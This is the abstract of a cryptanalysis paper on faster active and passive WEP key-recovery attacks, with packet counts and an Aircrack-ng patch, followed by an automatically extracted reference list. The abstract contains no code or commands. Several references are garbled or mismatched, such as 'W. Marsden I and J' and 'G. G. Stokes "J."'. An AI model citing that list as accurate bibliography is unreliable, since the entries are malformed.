Smashing WEP in a Passive Attack

In this paper, we report extremely fast and optimised active and passive attacks against the old IEEE 802.11 wireless communication protocol WEP. This was achieved through a huge amount of theoretical and experimental analysis (capturing WiFi packets), refinement and optimisation of all the former known attacks and methodologies against RC4 stream cipher in WEP mode. We support all our claims by providing an implementation of this attack as a publicly available patch on Aircrack-ng. Our new attacks improve its success probability drastically. We adapt our theoretical analysis in Eurocrypt 2011 to real-world scenarios and we perform a slight adjustment to match the empirical observations. Our active attack, based on ARP injection, requires \(22\,500\) packets to gain success probability of \(50\,\%\) against a \(104\)-bit WEP key, using Aircrack-ng in non-interactive mode. It runs in less than \(5\) s on an off-the-shelf PC. Using the same number of packets, Aicrack-ng yields around \(3\,\%\) success rate. Furthermore, we describe very fast passive only attacks by just eavesdropping TCP/IPv4 packets in a WiFi communication. Our passive attack requires \(27\,500\) packets. This is much less than the number of packets Aircrack-ng requires in active mode (around \(37\,500\)), which is a huge improvement. We believe that our analysis brings on further insight to the security of RC4.

[1]  Ansi Ieee,et al.  Part11 : Wireless LAN Media Access Control (MAC) and Physical Layer (PHY) Specifications , 1999 .

[2]  Jerzy Neyman,et al.  On a New Class of "Contagious" Distributions, Applicable in Entomology and Bacteriology , 1939 .

[3]  A. M. Abdullah,et al.  Wireless lan medium access control (mac) and physical layer (phy) specifications , 1997 .

[4]  L. Polynomials ON A GENERAL CLASS OF , 2005 .

[5]  Pouyan Sepehrdad,et al.  Statistical and Algebraic Cryptanalysis of Lightweight and Ultra-Lightweight Symmetric Primitives , 2012 .

[6]  Adi Shamir,et al.  Weaknesses in the Key Scheduling Algorithm of RC4 , 2001, Selected Areas in Cryptography.

[7]  Stephen J. Wright,et al.  Numerical Optimization (Springer Series in Operations Research and Financial Engineering) , 2000 .

[8]  W. Marsden I and J , 2012 .

[9]  Goutam Paul,et al.  Permutation After RC4 Key Scheduling Reveals the Secret Key , 2007, Selected Areas in Cryptography.

[10]  W. Feller On a General Class of "Contagious" Distributions , 1943 .

[11]  John Ioannidis,et al.  Using the Fluhrer, Mantin, and Shamir Attack to Break WEP , 2002, NDSS.

[12]  Serge Vaudenay,et al.  Discovery and Exploitation of New Biases in RC4 , 2010, Selected Areas in Cryptography.

[13]  Erale De Lausanne Statistical and Algebraic Cryptanalysis of Lightweight and Ultra-Lightweight Symmetric Primitives , 2012 .

[14]  John Ioannidis,et al.  A key recovery attack on the 802.11b wired equivalent privacy protocol (WEP) , 2004, TSEC.

[15]  吉原 友吉,et al.  J. Neyman : On a new class of "contagious" distributions applicable in Entomology and Bacteriology, Ann. Math. Statistics, 10(1939) 35-57. , 1941 .

[16]  Erik Tews,et al.  Attacks on the WEP protocol , 2007, IACR Cryptol. ePrint Arch..

[17]  David A. Wagner,et al.  Intercepting mobile communications: the insecurity of 802.11 , 2001, MobiCom '01.

[18]  Goutam Paul,et al.  New Form of Permutation Bias and Secret Key Leakage in Keystream Bytes of RC4 , 2008, FSE.

[19]  Itsik Mantin,et al.  A Practical Attack on the Fixed RC4 in the WEP Mode , 2005, ASIACRYPT.

[20]  Aggelos Kiayias,et al.  Polynomial Reconstruction Based Cryptography , 2001, Selected Areas in Cryptography.

[21]  Jon Postel,et al.  Standard for the transmission of IP datagrams over IEEE 802 networks , 1988, RFC.

[22]  Stephen J. Wright,et al.  Numerical Optimization , 2018, Fundamental Statistical Inference.

[23]  Serge Vaudenay,et al.  Passive-Only Key Recovery Attacks on RC4 , 2007, Selected Areas in Cryptography.

[24]  Rafik Chaabouni Break WEP Faster with Statistical Analysis , 2013, IACR Cryptol. ePrint Arch..

[25]  H. C. S. Thom,et al.  The frequency of hail occurrence , 1957 .

[26]  Gerhard Goos,et al.  Fast Software Encryption , 2001, Lecture Notes in Computer Science.

[27]  Serge Vaudenay,et al.  Statistical Attack on RC4 - Distinguishing WPA , 2011, EUROCRYPT.

[28]  Student,et al.  ON THE ERROR OF COUNTING WITH A HAEMACYTOMETER , 1907 .

[29]  Goutam Paul,et al.  (Non-)Random Sequences from (Non-)Random Permutations—Analysis of RC4 Stream Cipher , 2012, Journal of Cryptology.

[30]  Erik Tews,et al.  Breaking 104 Bit WEP in Less Than 60 Seconds , 2007, WISA.

[31]  F. J. Anscombe,et al.  Sampling theory of the negative binomial and logarithmic series distributions. , 1950, Biometrika.

[32]  Alexander Maximov Two Linear Distinguishing Attacks on VMPC and RC4A and Weakness of RC4 Family of Stream Ciphers , 2005, FSE.

[33]  L. Whitaker,et al.  ON THE POISSON LAW OF SMALL NUMBERS , 1914 .

[34]  Kenneth G. Paterson Advances in Cryptology - EUROCRYPT 2011 - 30th Annual International Conference on the Theory and Applications of Cryptographic Techniques, Tallinn, Estonia, May 15-19, 2011. Proceedings , 2011, EUROCRYPT.

[35]  Andreas Klein,et al.  Attacks on the RC4 stream cipher , 2008, Des. Codes Cryptogr..

[36]  G. G. Stokes "J." , 1890, The New Yale Book of Quotations.

[37]  Erik Tews,et al.  Practical attacks against WEP and WPA , 2009, WiSec '09.

[38]  C. I. Bliss,et al.  FITTING THE NEGATIVE BINOMIAL DISTRIBUTION TO BIOLOGICAL DATA AND NOTE ON THE EFFICIENT FITTING OF THE NEGATIVE BINOMIAL , 1953 .